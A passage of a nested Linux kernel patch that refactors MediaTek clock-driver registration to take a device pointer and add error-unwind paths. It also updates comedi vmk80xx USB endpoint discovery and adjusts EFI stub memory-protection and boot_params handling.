+-	mtk_clk_register_composites(top_adj_divs, ARRAY_SIZE(top_adj_divs), base, &mt8192_clk_lock,
+-				    top_clk_data);
+-	r = mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks), top_clk_data);
++	r = mtk_clk_register_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks), top_clk_data);
+ 	if (r)
+ 		return r;
+ 
++	r = mtk_clk_register_factors(top_early_divs, ARRAY_SIZE(top_early_divs), top_clk_data);
++	if (r)
++		goto unregister_fixed_clks;
++
++	r = mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), top_clk_data);
++	if (r)
++		goto unregister_early_factors;
++
++	r = mtk_clk_register_muxes(&pdev->dev, top_mtk_muxes,
++				   ARRAY_SIZE(top_mtk_muxes), node,
++				   &mt8192_clk_lock, top_clk_data);
++	if (r)
++		goto unregister_factors;
++
++	r = mtk_clk_register_composites(&pdev->dev, top_muxes,
++					ARRAY_SIZE(top_muxes), base,
++					&mt8192_clk_lock, top_clk_data);
++	if (r)
++		goto unregister_muxes;
++
++	r = mtk_clk_register_composites(&pdev->dev, top_adj_divs,
++					ARRAY_SIZE(top_adj_divs), base,
++					&mt8192_clk_lock, top_clk_data);
++	if (r)
++		goto unregister_top_composites;
++
++	r = mtk_clk_register_gates(&pdev->dev, node, top_clks,
++				   ARRAY_SIZE(top_clks), top_clk_data);
++	if (r)
++		goto unregister_adj_divs_composites;
++
+ 	r = clk_mt8192_reg_mfg_mux_notifier(&pdev->dev,
+ 					    top_clk_data->hws[CLK_TOP_MFG_PLL_SEL]->clk);
+ 	if (r)
+-		return r;
++		goto unregister_gates;
+ 
+-
+-	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get,
++	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, top_clk_data);
++	if (r)
++		goto unregister_gates;
++
++	return 0;
++
++unregister_gates:
++	mtk_clk_unregister_gates(top_clks, ARRAY_SIZE(top_clks), top_clk_data);
++unregister_adj_divs_composites:
++	mtk_clk_unregister_composites(top_adj_divs, ARRAY_SIZE(top_adj_divs), top_clk_data);
++unregister_top_composites:
++	mtk_clk_unregister_composites(top_muxes, ARRAY_SIZE(top_muxes), top_clk_data);
++unregister_muxes:
++	mtk_clk_unregister_muxes(top_mtk_muxes, ARRAY_SIZE(top_mtk_muxes), top_clk_data);
++unregister_factors:
++	mtk_clk_unregister_factors(top_divs, ARRAY_SIZE(top_divs), top_clk_data);
++unregister_early_factors:
++	mtk_clk_unregister_factors(top_early_divs, ARRAY_SIZE(top_early_divs), top_clk_data);
++unregister_fixed_clks:
++	mtk_clk_unregister_fixed_clks(top_fixed_clks, ARRAY_SIZE(top_fixed_clks),
+ 				      top_clk_data);
++	return r;
+ }
+ 
+ static int clk_mt8192_infra_probe(struct platform_device *pdev)
+@@ -1133,20 +1174,23 @@ static int clk_mt8192_infra_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++				   ARRAY_SIZE(infra_clks), clk_data);
+ 	if (r)
+ 		goto free_clk_data;
+ 
+ 	r = mtk_register_reset_controller_with_dev(&pdev->dev, &clk_rst_desc);
+ 	if (r)
+-		goto free_clk_data;
++		goto unregister_gates;
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+-		goto free_clk_data;
++		goto unregister_gates;
+ 
+ 	return r;
+ 
++unregister_gates:
++	mtk_clk_unregister_gates(infra_clks, ARRAY_SIZE(infra_clks), clk_data);
+ free_clk_data:
+ 	mtk_free_clk_data(clk_data);
+ 	return r;
+@@ -1162,16 +1206,19 @@ static int clk_mt8192_peri_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++				   ARRAY_SIZE(peri_clks), clk_data);
+ 	if (r)
+ 		goto free_clk_data;
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+-		goto free_clk_data;
++		goto unregister_gates;
+ 
+ 	return r;
+ 
++unregister_gates:
++	mtk_clk_unregister_gates(peri_clks, ARRAY_SIZE(peri_clks), clk_data);
+ free_clk_data:
+ 	mtk_free_clk_data(clk_data);
+ 	return r;
+@@ -1188,16 +1235,19 @@ static int clk_mt8192_apmixed_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+-	r = mtk_clk_register_gates(node, apmixed_clks, ARRAY_SIZE(apmixed_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
++				   ARRAY_SIZE(apmixed_clks), clk_data);
+ 	if (r)
+ 		goto free_clk_data;
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+-		goto free_clk_data;
++		goto unregister_gates;
+ 
+ 	return r;
+ 
++unregister_gates:
++	mtk_clk_unregister_gates(apmixed_clks, ARRAY_SIZE(apmixed_clks), clk_data);
+ free_clk_data:
+ 	mtk_free_clk_data(clk_data);
+ 	return r;
+diff --git a/drivers/clk/mediatek/clk-mt8195-apmixedsys.c b/drivers/clk/mediatek/clk-mt8195-apmixedsys.c
+index 0dfed6ec4d155..1bc917f2667e4 100644
+--- a/drivers/clk/mediatek/clk-mt8195-apmixedsys.c
++++ b/drivers/clk/mediatek/clk-mt8195-apmixedsys.c
+@@ -124,7 +124,8 @@ static int clk_mt8195_apmixed_probe(struct platform_device *pdev)
+ 	if (r)
+ 		goto free_apmixed_data;
+ 
+-	r = mtk_clk_register_gates(node, apmixed_clks, ARRAY_SIZE(apmixed_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
++				   ARRAY_SIZE(apmixed_clks), clk_data);
+ 	if (r)
+ 		goto unregister_plls;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8195-topckgen.c b/drivers/clk/mediatek/clk-mt8195-topckgen.c
+index 1e016329c1d23..3485ebb17ab83 100644
+--- a/drivers/clk/mediatek/clk-mt8195-topckgen.c
++++ b/drivers/clk/mediatek/clk-mt8195-topckgen.c
+@@ -1262,7 +1262,8 @@ static int clk_mt8195_topck_probe(struct platform_device *pdev)
+ 	if (r)
+ 		goto unregister_fixed_clks;
+ 
+-	r = mtk_clk_register_muxes(top_mtk_muxes, ARRAY_SIZE(top_mtk_muxes), node,
++	r = mtk_clk_register_muxes(&pdev->dev, top_mtk_muxes,
++				   ARRAY_SIZE(top_mtk_muxes), node,
+ 				   &mt8195_clk_lock, top_clk_data);
+ 	if (r)
+ 		goto unregister_factors;
+@@ -1281,12 +1282,14 @@ static int clk_mt8195_topck_probe(struct platform_device *pdev)
+ 	if (r)
+ 		goto unregister_muxes;
+ 
+-	r = mtk_clk_register_composites(top_adj_divs, ARRAY_SIZE(top_adj_divs), base,
++	r = mtk_clk_register_composites(&pdev->dev, top_adj_divs,
++					ARRAY_SIZE(top_adj_divs), base,
+ 					&mt8195_clk_lock, top_clk_data);
+ 	if (r)
+ 		goto unregister_muxes;
+ 
+-	r = mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks), top_clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, top_clks,
++				   ARRAY_SIZE(top_clks), top_clk_data);
+ 	if (r)
+ 		goto unregister_composite_divs;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8195-vdo0.c b/drivers/clk/mediatek/clk-mt8195-vdo0.c
+index 07b46bfd50406..839b730688acb 100644
+--- a/drivers/clk/mediatek/clk-mt8195-vdo0.c
++++ b/drivers/clk/mediatek/clk-mt8195-vdo0.c
+@@ -104,7 +104,8 @@ static int clk_mt8195_vdo0_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, vdo0_clks, ARRAY_SIZE(vdo0_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, vdo0_clks,
++				   ARRAY_SIZE(vdo0_clks), clk_data);
+ 	if (r)
+ 		goto free_vdo0_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8195-vdo1.c b/drivers/clk/mediatek/clk-mt8195-vdo1.c
+index 835335b9d87bb..7df695b289258 100644
+--- a/drivers/clk/mediatek/clk-mt8195-vdo1.c
++++ b/drivers/clk/mediatek/clk-mt8195-vdo1.c
+@@ -131,7 +131,8 @@ static int clk_mt8195_vdo1_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates(node, vdo1_clks, ARRAY_SIZE(vdo1_clks), clk_data);
++	r = mtk_clk_register_gates(&pdev->dev, node, vdo1_clks,
++				   ARRAY_SIZE(vdo1_clks), clk_data);
+ 	if (r)
+ 		goto free_vdo1_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8365-mm.c b/drivers/clk/mediatek/clk-mt8365-mm.c
+index 5c8bf18ab1f1d..22c75a03a6452 100644
+--- a/drivers/clk/mediatek/clk-mt8365-mm.c
++++ b/drivers/clk/mediatek/clk-mt8365-mm.c
+@@ -81,9 +81,8 @@ static int clk_mt8365_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR_CLK);
+ 
+-	ret = mtk_clk_register_gates_with_dev(node, mm_clks,
+-					      ARRAY_SIZE(mm_clks), clk_data,
+-					      dev);
++	ret = mtk_clk_register_gates(dev, node, mm_clks,
++				     ARRAY_SIZE(mm_clks), clk_data);
+ 	if (ret)
+ 		goto err_free_clk_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8365.c b/drivers/clk/mediatek/clk-mt8365.c
+index adfecb618f102..c9faa07ec0a64 100644
+--- a/drivers/clk/mediatek/clk-mt8365.c
++++ b/drivers/clk/mediatek/clk-mt8365.c
+@@ -947,12 +947,13 @@ static int clk_mt8365_top_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto unregister_fixed_clks;
+ 
+-	ret = mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes), node,
++	ret = mtk_clk_register_muxes(&pdev->dev, top_muxes,
++				     ARRAY_SIZE(top_muxes), node,
+ 				     &mt8365_clk_lock, clk_data);
+ 	if (ret)
+ 		goto unregister_factors;
+ 
+-	ret = mtk_clk_register_composites(top_misc_mux_gates,
++	ret = mtk_clk_register_composites(&pdev->dev, top_misc_mux_gates,
+ 					  ARRAY_SIZE(top_misc_mux_gates), base,
+ 					  &mt8365_clk_lock, clk_data);
+ 	if (ret)
+@@ -1019,8 +1020,8 @@ static int clk_mt8365_infra_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	ret = mtk_clk_register_gates(node, ifr_clks, ARRAY_SIZE(ifr_clks),
+-				     clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, ifr_clks,
++				     ARRAY_SIZE(ifr_clks), clk_data);
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+@@ -1080,8 +1081,9 @@ static int clk_mt8365_mcu_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	ret = mtk_clk_register_composites(mcu_muxes, ARRAY_SIZE(mcu_muxes),
+-					  base, &mt8365_clk_lock, clk_data);
++	ret = mtk_clk_register_composites(&pdev->dev, mcu_muxes,
++					  ARRAY_SIZE(mcu_muxes), base,
++					  &mt8365_clk_lock, clk_data);
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt8516-aud.c b/drivers/clk/mediatek/clk-mt8516-aud.c
+index a3dafc719799c..a6ae8003b9ff6 100644
+--- a/drivers/clk/mediatek/clk-mt8516-aud.c
++++ b/drivers/clk/mediatek/clk-mt8516-aud.c
+@@ -48,7 +48,7 @@ static void __init mtk_audsys_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_AUD_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, aud_clks, ARRAY_SIZE(aud_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, aud_clks, ARRAY_SIZE(aud_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt8516.c b/drivers/clk/mediatek/clk-mt8516.c
+index 056953d594c66..6983d3a48dc9a 100644
+--- a/drivers/clk/mediatek/clk-mt8516.c
++++ b/drivers/clk/mediatek/clk-mt8516.c
+@@ -655,11 +655,12 @@ static void __init mtk_topckgen_init(struct device_node *node)
+ 
+ 	mtk_clk_register_fixed_clks(fixed_clks, ARRAY_SIZE(fixed_clks),
+ 				    clk_data);
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks), clk_data);
++	mtk_clk_register_gates(NULL, node, top_clks, ARRAY_SIZE(top_clks), clk_data);
+ 
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+-		&mt8516_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt8516_clk_lock, clk_data);
+ 	mtk_clk_register_dividers(top_adj_divs, ARRAY_SIZE(top_adj_divs),
+ 				base, &mt8516_clk_lock, clk_data);
+ 
+@@ -684,8 +685,9 @@ static void __init mtk_infracfg_init(struct device_node *node)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_IFR_NR_CLK);
+ 
+-	mtk_clk_register_composites(ifr_muxes, ARRAY_SIZE(ifr_muxes), base,
+-		&mt8516_clk_lock, clk_data);
++	mtk_clk_register_composites(NULL, ifr_muxes,
++				    ARRAY_SIZE(ifr_muxes), base,
++				    &mt8516_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mtk.c b/drivers/clk/mediatek/clk-mtk.c
+index d31f01d0ba1c2..fa2c1b1c7dee4 100644
+--- a/drivers/clk/mediatek/clk-mtk.c
++++ b/drivers/clk/mediatek/clk-mtk.c
+@@ -11,12 +11,15 @@
+ #include <linux/mfd/syscon.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
++#include <linux/of_address.h>
+ #include <linux/of_device.h>
+ #include <linux/platform_device.h>
++#include <linux/pm_runtime.h>
+ #include <linux/slab.h>
+ 
+ #include "clk-mtk.h"
+ #include "clk-gate.h"
++#include "clk-mux.h"
+ 
+ static void mtk_init_clk_data(struct clk_hw_onecell_data *clk_data,
+ 			      unsigned int clk_num)
+@@ -197,8 +200,8 @@ void mtk_clk_unregister_factors(const struct mtk_fixed_factor *clks, int num,
+ }
+ EXPORT_SYMBOL_GPL(mtk_clk_unregister_factors);
+ 
+-static struct clk_hw *mtk_clk_register_composite(const struct mtk_composite *mc,
+-		void __iomem *base, spinlock_t *lock)
++static struct clk_hw *mtk_clk_register_composite(struct device *dev,
++		const struct mtk_composite *mc, void __iomem *base, spinlock_t *lock)
+ {
+ 	struct clk_hw *hw;
+ 	struct clk_mux *mux = NULL;
+@@ -264,7 +267,7 @@ static struct clk_hw *mtk_clk_register_composite(const struct mtk_composite *mc,
+ 		div_ops = &clk_divider_ops;
+ 	}
+ 
+-	hw = clk_hw_register_composite(NULL, mc->name, parent_names, num_parents,
++	hw = clk_hw_register_composite(dev, mc->name, parent_names, num_parents,
+ 		mux_hw, mux_ops,
+ 		div_hw, div_ops,
+ 		gate_hw, gate_ops,
+@@ -308,7 +311,8 @@ static void mtk_clk_unregister_composite(struct clk_hw *hw)
+ 	kfree(mux);
+ }
+ 
+-int mtk_clk_register_composites(const struct mtk_composite *mcs, int num,
++int mtk_clk_register_composites(struct device *dev,
++				const struct mtk_composite *mcs, int num,
+ 				void __iomem *base, spinlock_t *lock,
+ 				struct clk_hw_onecell_data *clk_data)
+ {
+@@ -327,7 +331,7 @@ int mtk_clk_register_composites(const struct mtk_composite *mcs, int num,
+ 			continue;
+ 		}
+ 
+-		hw = mtk_clk_register_composite(mc, base, lock);
++		hw = mtk_clk_register_composite(dev, mc, base, lock);
+ 
+ 		if (IS_ERR(hw)) {
+ 			pr_err("Failed to register clk %s: %pe\n", mc->name,
+@@ -449,20 +453,81 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 	const struct mtk_clk_desc *mcd;
+ 	struct clk_hw_onecell_data *clk_data;
+ 	struct device_node *node = pdev->dev.of_node;
+-	int r;
++	void __iomem *base;
++	int num_clks, r;
+ 
+ 	mcd = of_device_get_match_data(&pdev->dev);
+ 	if (!mcd)
+ 		return -EINVAL;
+ 
+-	clk_data = mtk_alloc_clk_data(mcd->num_clks);
++	/* Composite clocks needs us to pass iomem pointer */
++	if (mcd->composite_clks) {
++		if (!mcd->shared_io)
++			base = devm_platform_ioremap_resource(pdev, 0);
++		else
++			base = of_iomap(node, 0);
++
++		if (IS_ERR_OR_NULL(base))
++			return IS_ERR(base) ? PTR_ERR(base) : -ENOMEM;
++	}
++
++
++	devm_pm_runtime_enable(&pdev->dev);
++	/*
++	 * Do a pm_runtime_resume_and_get() to workaround a possible
++	 * deadlock between clk_register() and the genpd framework.
++	 */
++	r = pm_runtime_resume_and_get(&pdev->dev);
++	if (r)
++		return r;
++
++	/* Calculate how many clk_hw_onecell_data entries to allocate */
++	num_clks = mcd->num_clks + mcd->num_composite_clks;
++	num_clks += mcd->num_fixed_clks + mcd->num_factor_clks;
++	num_clks += mcd->num_mux_clks;
++
++	clk_data = mtk_alloc_clk_data(num_clks);
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	r = mtk_clk_register_gates_with_dev(node, mcd->clks, mcd->num_clks,
+-					    clk_data, &pdev->dev);
+-	if (r)
+-		goto free_data;
++	if (mcd->fixed_clks) {
++		r = mtk_clk_register_fixed_clks(mcd->fixed_clks,
++						mcd->num_fixed_clks, clk_data);
++		if (r)
++			goto free_data;
++	}
++
++	if (mcd->factor_clks) {
++		r = mtk_clk_register_factors(mcd->factor_clks,
++					     mcd->num_factor_clks, clk_data);
++		if (r)
++			goto unregister_fixed_clks;
++	}
++
++	if (mcd->mux_clks) {
++		r = mtk_clk_register_muxes(&pdev->dev, mcd->mux_clks,
++					   mcd->num_mux_clks, node,
++					   mcd->clk_lock, clk_data);
++		if (r)
++			goto unregister_factors;
++	};
++
++	if (mcd->composite_clks) {
++		/* We don't check composite_lock because it's optional */
++		r = mtk_clk_register_composites(&pdev->dev,
++						mcd->composite_clks,
++						mcd->num_composite_clks,
++						base, mcd->clk_lock, clk_data);
++		if (r)
++			goto unregister_muxes;
++	}
++
++	if (mcd->clks) {
++		r = mtk_clk_register_gates(&pdev->dev, node, mcd->clks,
++					   mcd->num_clks, clk_data);
++		if (r)
++			goto unregister_composites;
++	}
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -477,12 +542,35 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 			goto unregister_clks;
+ 	}
+ 
++	pm_runtime_put(&pdev->dev);
++
+ 	return r;
+ 
+ unregister_clks:
+-	mtk_clk_unregister_gates(mcd->clks, mcd->num_clks, clk_data);
++	if (mcd->clks)
++		mtk_clk_unregister_gates(mcd->clks, mcd->num_clks, clk_data);
++unregister_composites:
++	if (mcd->composite_clks)
++		mtk_clk_unregister_composites(mcd->composite_clks,
++					      mcd->num_composite_clks, clk_data);
++unregister_muxes:
++	if (mcd->mux_clks)
++		mtk_clk_unregister_muxes(mcd->mux_clks,
++					 mcd->num_mux_clks, clk_data);
++unregister_factors:
++	if (mcd->factor_clks)
++		mtk_clk_unregister_factors(mcd->factor_clks,
++					   mcd->num_factor_clks, clk_data);
++unregister_fixed_clks:
++	if (mcd->fixed_clks)
++		mtk_clk_unregister_fixed_clks(mcd->fixed_clks,
++					      mcd->num_fixed_clks, clk_data);
+ free_data:
+ 	mtk_free_clk_data(clk_data);
++	if (mcd->shared_io && base)
++		iounmap(base);
++
++	pm_runtime_put(&pdev->dev);
+ 	return r;
+ }
+ EXPORT_SYMBOL_GPL(mtk_clk_simple_probe);
+@@ -494,7 +582,20 @@ int mtk_clk_simple_remove(struct platform_device *pdev)
+ 	struct device_node *node = pdev->dev.of_node;
+ 
+ 	of_clk_del_provider(node);
+-	mtk_clk_unregister_gates(mcd->clks, mcd->num_clks, clk_data);
++	if (mcd->clks)
++		mtk_clk_unregister_gates(mcd->clks, mcd->num_clks, clk_data);
++	if (mcd->composite_clks)
++		mtk_clk_unregister_composites(mcd->composite_clks,
++					      mcd->num_composite_clks, clk_data);
++	if (mcd->mux_clks)
++		mtk_clk_unregister_muxes(mcd->mux_clks,
++					 mcd->num_mux_clks, clk_data);
++	if (mcd->factor_clks)
++		mtk_clk_unregister_factors(mcd->factor_clks,
++					   mcd->num_factor_clks, clk_data);
++	if (mcd->fixed_clks)
++		mtk_clk_unregister_fixed_clks(mcd->fixed_clks,
++					      mcd->num_fixed_clks, clk_data);
+ 	mtk_free_clk_data(clk_data);
+ 
+ 	return 0;
+diff --git a/drivers/clk/mediatek/clk-mtk.h b/drivers/clk/mediatek/clk-mtk.h
+index 63ae7941aa92f..880b3d6d80119 100644
+--- a/drivers/clk/mediatek/clk-mtk.h
++++ b/drivers/clk/mediatek/clk-mtk.h
+@@ -149,7 +149,8 @@ struct mtk_composite {
+ 		.flags = 0,						\
+ 	}
+ 
+-int mtk_clk_register_composites(const struct mtk_composite *mcs, int num,
++int mtk_clk_register_composites(struct device *dev,
++				const struct mtk_composite *mcs, int num,
+ 				void __iomem *base, spinlock_t *lock,
+ 				struct clk_hw_onecell_data *clk_data);
+ void mtk_clk_unregister_composites(const struct mtk_composite *mcs, int num,
+@@ -195,7 +196,17 @@ void mtk_clk_unregister_ref2usb_tx(struct clk_hw *hw);
+ struct mtk_clk_desc {
+ 	const struct mtk_gate *clks;
+ 	size_t num_clks;
++	const struct mtk_composite *composite_clks;
++	size_t num_composite_clks;
++	const struct mtk_fixed_clk *fixed_clks;
++	size_t num_fixed_clks;
++	const struct mtk_fixed_factor *factor_clks;
++	size_t num_factor_clks;
++	const struct mtk_mux *mux_clks;
++	size_t num_mux_clks;
+ 	const struct mtk_clk_rst_desc *rst_desc;
++	spinlock_t *clk_lock;
++	bool shared_io;
+ };
+ 
+ int mtk_clk_simple_probe(struct platform_device *pdev);
+diff --git a/drivers/clk/mediatek/clk-mux.c b/drivers/clk/mediatek/clk-mux.c
+index ba1720b9e2310..c8593554239d6 100644
+--- a/drivers/clk/mediatek/clk-mux.c
++++ b/drivers/clk/mediatek/clk-mux.c
+@@ -154,9 +154,10 @@ const struct clk_ops mtk_mux_gate_clr_set_upd_ops  = {
+ };
+ EXPORT_SYMBOL_GPL(mtk_mux_gate_clr_set_upd_ops);
+ 
+-static struct clk_hw *mtk_clk_register_mux(const struct mtk_mux *mux,
+-				 struct regmap *regmap,
+-				 spinlock_t *lock)
++static struct clk_hw *mtk_clk_register_mux(struct device *dev,
++					   const struct mtk_mux *mux,
++					   struct regmap *regmap,
++					   spinlock_t *lock)
+ {
+ 	struct mtk_clk_mux *clk_mux;
+ 	struct clk_init_data init = {};
+@@ -177,7 +178,7 @@ static struct clk_hw *mtk_clk_register_mux(const struct mtk_mux *mux,
+ 	clk_mux->lock = lock;
+ 	clk_mux->hw.init = &init;
+ 
+-	ret = clk_hw_register(NULL, &clk_mux->hw);
++	ret = clk_hw_register(dev, &clk_mux->hw);
+ 	if (ret) {
+ 		kfree(clk_mux);
+ 		return ERR_PTR(ret);
+@@ -198,7 +199,8 @@ static void mtk_clk_unregister_mux(struct clk_hw *hw)
+ 	kfree(mux);
+ }
+ 
+-int mtk_clk_register_muxes(const struct mtk_mux *muxes,
++int mtk_clk_register_muxes(struct device *dev,
++			   const struct mtk_mux *muxes,
+ 			   int num, struct device_node *node,
+ 			   spinlock_t *lock,
+ 			   struct clk_hw_onecell_data *clk_data)
+@@ -222,7 +224,7 @@ int mtk_clk_register_muxes(const struct mtk_mux *muxes,
+ 			continue;
+ 		}
+ 
+-		hw = mtk_clk_register_mux(mux, regmap, lock);
++		hw = mtk_clk_register_mux(dev, mux, regmap, lock);
+ 
+ 		if (IS_ERR(hw)) {
+ 			pr_err("Failed to register clk %s: %pe\n", mux->name,
+diff --git a/drivers/clk/mediatek/clk-mux.h b/drivers/clk/mediatek/clk-mux.h
+index 83ff420f4ebe6..7ecb963b0ec68 100644
+--- a/drivers/clk/mediatek/clk-mux.h
++++ b/drivers/clk/mediatek/clk-mux.h
+@@ -83,7 +83,8 @@ extern const struct clk_ops mtk_mux_gate_clr_set_upd_ops;
+ 			0, _upd_ofs, _upd, CLK_SET_RATE_PARENT,		\
+ 			mtk_mux_clr_set_upd_ops)
+ 
+-int mtk_clk_register_muxes(const struct mtk_mux *muxes,
++int mtk_clk_register_muxes(struct device *dev,
++			   const struct mtk_mux *muxes,
+ 			   int num, struct device_node *node,
+ 			   spinlock_t *lock,
+ 			   struct clk_hw_onecell_data *clk_data);
+diff --git a/drivers/comedi/drivers/vmk80xx.c b/drivers/comedi/drivers/vmk80xx.c
+index 4536ed43f65b2..84dce5184a77a 100644
+--- a/drivers/comedi/drivers/vmk80xx.c
++++ b/drivers/comedi/drivers/vmk80xx.c
+@@ -641,33 +641,22 @@ static int vmk80xx_find_usb_endpoints(struct comedi_device *dev)
+ 	struct vmk80xx_private *devpriv = dev->private;
+ 	struct usb_interface *intf = comedi_to_usb_interface(dev);
+ 	struct usb_host_interface *iface_desc = intf->cur_altsetting;
+-	struct usb_endpoint_descriptor *ep_desc;
+-	int i;
+-
+-	if (iface_desc->desc.bNumEndpoints != 2)
+-		return -ENODEV;
+-
+-	for (i = 0; i < iface_desc->desc.bNumEndpoints; i++) {
+-		ep_desc = &iface_desc->endpoint[i].desc;
+-
+-		if (usb_endpoint_is_int_in(ep_desc) ||
+-		    usb_endpoint_is_bulk_in(ep_desc)) {
+-			if (!devpriv->ep_rx)
+-				devpriv->ep_rx = ep_desc;
+-			continue;
+-		}
++	struct usb_endpoint_descriptor *ep_rx_desc, *ep_tx_desc;
++	int ret;
+ 
+-		if (usb_endpoint_is_int_out(ep_desc) ||
+-		    usb_endpoint_is_bulk_out(ep_desc)) {
+-			if (!devpriv->ep_tx)
+-				devpriv->ep_tx = ep_desc;
+-			continue;
+-		}
+-	}
++	if (devpriv->model == VMK8061_MODEL)
++		ret = usb_find_common_endpoints(iface_desc, &ep_rx_desc,
++						&ep_tx_desc, NULL, NULL);
++	else
++		ret = usb_find_common_endpoints(iface_desc, NULL, NULL,
++						&ep_rx_desc, &ep_tx_desc);
+ 
+-	if (!devpriv->ep_rx || !devpriv->ep_tx)
++	if (ret)
+ 		return -ENODEV;
+ 
++	devpriv->ep_rx = ep_rx_desc;
++	devpriv->ep_tx = ep_tx_desc;
++
+ 	if (!usb_endpoint_maxp(devpriv->ep_rx) || !usb_endpoint_maxp(devpriv->ep_tx))
+ 		return -EINVAL;
+ 
+diff --git a/drivers/firmware/efi/libstub/Makefile b/drivers/firmware/efi/libstub/Makefile
+index 473ef18421db0..748781c257871 100644
+--- a/drivers/firmware/efi/libstub/Makefile
++++ b/drivers/firmware/efi/libstub/Makefile
+@@ -102,13 +102,6 @@ lib-y				:= $(patsubst %.o,%.stub.o,$(lib-y))
+ # https://bugs.llvm.org/show_bug.cgi?id=46480
+ STUBCOPY_FLAGS-y		+= --remove-section=.note.gnu.property
+ 
+-#
+-# For x86, bootloaders like systemd-boot or grub-efi do not zero-initialize the
+-# .bss section, so the .bss section of the EFI stub needs to be included in the
+-# .data section of the compressed kernel to ensure initialization. Rename the
+-# .bss section here so it's easy to pick out in the linker script.
+-#
+-STUBCOPY_FLAGS-$(CONFIG_X86)	+= --rename-section .bss=.bss.efistub,load,alloc
+ STUBCOPY_RELOC-$(CONFIG_X86_32)	:= R_386_32
+ STUBCOPY_RELOC-$(CONFIG_X86_64)	:= R_X86_64_64
+ 
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index dc50dda40239e..55468debd55d0 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -227,6 +227,15 @@ efi_status_t efi_adjust_memory_range_protection(unsigned long start,
+ 	rounded_end = roundup(start + size, EFI_PAGE_SIZE);
+ 
+ 	if (memattr != NULL) {
++		status = efi_call_proto(memattr, set_memory_attributes,
++					rounded_start,
++					rounded_end - rounded_start,
++					EFI_MEMORY_RO);
++		if (status != EFI_SUCCESS) {
++			efi_warn("Failed to set EFI_MEMORY_RO attribute\n");
++			return status;
++		}
++
+ 		status = efi_call_proto(memattr, clear_memory_attributes,
+ 					rounded_start,
+ 					rounded_end - rounded_start,
+@@ -426,9 +435,8 @@ void __noreturn efi_stub_entry(efi_handle_t handle,
+ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 				   efi_system_table_t *sys_table_arg)
+ {
+-	struct boot_params *boot_params;
+-	struct setup_header *hdr;
+-	void *image_base;
++	static struct boot_params boot_params __page_aligned_bss;
++	struct setup_header *hdr = &boot_params.hdr;
+ 	efi_guid_t proto = LOADED_IMAGE_PROTOCOL_GUID;
+ 	int options_size = 0;
